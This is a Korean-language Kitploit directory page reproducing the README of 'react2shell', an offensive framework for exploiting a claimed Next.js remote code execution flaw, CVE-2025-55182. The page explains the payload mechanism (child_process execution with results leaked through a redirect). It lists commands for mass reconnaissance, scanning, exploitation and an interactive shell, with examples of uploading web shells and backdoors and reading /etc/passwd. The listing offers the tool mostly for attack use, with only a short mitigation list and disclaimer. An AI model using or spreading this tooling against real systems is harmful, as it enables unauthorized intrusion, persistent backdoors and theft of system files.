Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
react2shell-cve-2025-55182 | Kitploit
도구/GitHubGitHub/opsecramdan/react2shell-cve-2025-55182
Privilege EscalationReconnaissanceVulnerability ScannersPayload GenerationExploitationWeb Application ExploitationPenetration TestingCommand and ControlSubdomain EnumerationRemote Access Tool
GitHubopsecramdan/react2shell-cve-2025-55182
4개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

react2shell-cve-2025-55182

저장소 보기

🚨 React2Shell - CVE-2025-55182 익스플로잇 프레임워크

Severity Type Platform Python

CVE-2025-55182(Next.js 원격 코드 실행)를 위한 고급 익스플로잇 프레임워크

Author: opsecramdan


📚 목차

  • 개요
  • 취약점 상세
  • 기능
  • 요구 사항
  • 설치
  • 사용법
  • 대화형 셸
  • 출력 파일
  • 영향
  • 완화
  • 제한 사항
  • 고지 사항

📌 개요

React2Shell은 Next.js 기반 애플리케이션에서 CVE-2025-55182 취약점을 식별하고 악용하는 익스플로잇 프레임워크입니다.

이 도구는 다음을 포함하는 올인원 공격 툴킷으로 설계되었습니다:

  • 서브도메인 열거
  • 취약점 스캐닝
  • 익스플로잇 엔진
  • 대화형 원격 셸

🔍 취약점 상세

  • CVE ID: CVE-2025-55182
  • 유형: 원격 코드 실행 (RCE)
  • 플랫폼: Next.js
  • 공격 벡터: 악의적인 multipart/form-data 요청
  • 영향: 임의 명령 실행

🧠 근본 원인

이 취약점은 다음과 같은 방식으로 Next.js 내부 메커니즘을 악용합니다:

  1. 요청에 페이로드 삽입
  2. 호출: process.mainModule.require('child_process')
  3. OS 명령 실행
  4. 출력을 Base64로 인코딩
  5. 리디렉션(/login?a=)을 통한 결과 유출

⚙️ 기능

🔎 서브도메인 열거

  • DNS + HTTP 스캐닝
  • 내장 워드리스트
  • 사용자 정의 워드리스트 지원
  • 결과 자동 저장

🧪 취약점 스캐너

  • 다중 엔드포인트 테스트:
  • /
  • /api
  • /api/auth
  • /_next
  • /admin
  • /dashboard
  • 헤더 및 응답 분석
  • 오탐 감소

💣 익스플로잇 엔진

  • 자동 페이로드 생성
  • Base64 인코딩 실행
  • 리디렉션 기반 출력 추출

🖥️ 대화형 셸

  • 원격 명령 실행
  • 지속 세션
  • 디렉토리 추적

📂 파일 작업

  • 파일 업로드
  • 파일 다운로드
  • 파일 생성

👑 루트 모드

  • sudo -i 실행
  • 권한 상승 시뮬레이션

📦 요구 사항

  • Python 3.x

의존성 설치:

root@kitploit:~
pip install requests dnspython

📥 설치

1. 저장소 클론

root@kitploit:~
git clone https://github.com/yourusername/react2shell-cve-2025-55182.git

2. 디렉토리로 이동

root@kitploit:~
cd react2shell-cve-2025-55182

3. 도구 실행

root@kitploit:~
python3 react2shell.py

🚀 사용법

🎯 단일 대상

root@kitploit:~
python3 react2shell.py -u https://target.com

프로토콜 없이:

root@kitploit:~
python3 react2shell.py -u target.com

📄 여러 대상

root@kitploit:~
python3 react2shell.py -f targets.txt

targets.txt 내용 예시:

root@kitploit:~
https://target1.com
http://target2.com:3000
target3.com

🌐 전체 모드 (정찰 + 스캔 + 익스플로잇)

root@kitploit:~
python3 react2shell.py -d example.com

흐름:

  1. 서브도메인 열거
  2. 취약점 스캐닝
  3. 익스플로잇 (선택 사항)

📚 사용자 정의 워드리스트

root@kitploit:~
python3 react2shell.py -d example.com -w wordlist.txt

🐞 디버그 모드

root@kitploit:~
python3 react2shell.py -d example.com --debug

🖥️ 대화형 셸

익스플로잇이 성공하면 셸 액세스 권한을 얻을 수 있습니다.

기본 명령어

root@kitploit:~
whoami  
id  
uname -a  
pwd  
ls -lah  

⚙️ 특수 명령어


📂 파일 업로드

root@kitploit:~
.upload shell.php /tmp/shell.php

📥 파일 다운로드

root@kitploit:~
.download /etc/passwd

📄 파일 생성

root@kitploit:~
.create /tmp/test.txt

🔄 예시 워크플로우

1. 도메인 스캔

root@kitploit:~
python3 react2shell.py -d example.com

2. 취약한 대상 식별

3. 셸 접속

root@kitploit:~
whoami

4. 페이로드 업로드

root@kitploit:~
.upload backdoor.sh /tmp/backdoor.sh

📁 출력 파일

이 도구는 다음 파일을 생성합니다:

  • subdomains_*.txt
  • vulnerable_*.txt
  • output_*.txt

⚠️ 영향

악용에 성공할 경우:

  • 원격 명령 실행
  • 민감한 파일 접근
  • 백도어 업로드
  • 지속적 접근
  • 권한 상승

🛡️ 완화

  • Next.js를 최신 버전으로 업데이트
  • 내부 엔드포인트 제한
  • 입력 검증 강화
  • WAF(OWASP CRS) 사용
  • 비정상 활동 모니터링

⚠️ 고지 사항

이 도구는 다음 목적으로만 제작되었습니다:

  • 학습
  • 연구
  • 승인된 침투 테스트

불법 활동에 사용하는 것을 금지합니다.


⭐ 참고 사항

이 프로젝트는 다음을 보여줍니다:

  • 고급 익스플로잇 기술
  • Next.js 내부 구조 이해
  • 실제 환경 공격 시뮬레이션
도구 다운로드
Command
Description
.root루트 모드 전환
.upload대상에 파일 업로드
.download대상에서 파일 다운로드
.create대상에 파일 생성
.save출력을 로컬 파일로 저장
.exit셸 종료